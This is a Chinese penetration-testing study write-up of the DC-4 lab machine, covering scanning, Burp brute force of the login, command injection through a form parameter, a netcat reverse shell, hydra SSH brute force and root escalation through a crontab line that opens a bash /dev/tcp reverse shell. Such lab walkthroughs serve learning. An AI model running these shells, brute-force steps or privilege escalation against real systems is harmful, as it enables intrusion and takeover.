渗透测试学习之靶机DC-4

过程

1. 探测目标主机

nmap -sP 192.168.246.0/24，得到目标主机IP：192.168.246.141

2. 信息搜集

• 端口信息
  

• web站点的相关服务信息
  登录页面：
  
  

• 目录信息
  使用dirbuster：
  
  
  login.php和logout.php也会跳转到index.php这个登录页面。

3. 后台爆破

使用Burp爆破：
抓包后发送到Intruder后，选择Clusterbomb模式，分别载入字典，这里字典使用kali里的http_default_users.txt和burnett_top_1024.txt：


开始爆破：

登录后发现可以执行自带的一些命令：

4. 获取shell

使用Burp抓包后查看能否修改信息：

修改radio参数信息为whoami：

可以任意执行命令，反弹shell：
先在kali中监听再放包
nc -e /bin/sh 192.168.246.138 888


使用python得到交互式shell：
python -c 'import pty;pty.spawn("/bin/bash")'
查看/etc/passwd文件：
cat /etc/passwd

看到home下的三个用户，进入后在jim/backups里找到旧密码的备份文件：

复制保存在dc4.txt中，使用hydra爆破ssh：
hydra -l jim -P /root/Desktop/dc4.txt ssh://192.168.246.141

5. 登录ssh

使用爆破出来的用户密码：jim：jibril04

提示有封邮件：
进入mail目录

su切换用户到charles，并查看用户权限：
su charles

发现teehee是使用root权限免密执行。

6.利用teehee提权

参考文章
sudo teehee /etc/crontab
* * * * * root bash -c "bash -i >&/dev/tcp/192.168.246.138/8888 0>&1"

总结

• 好好学习，天天向上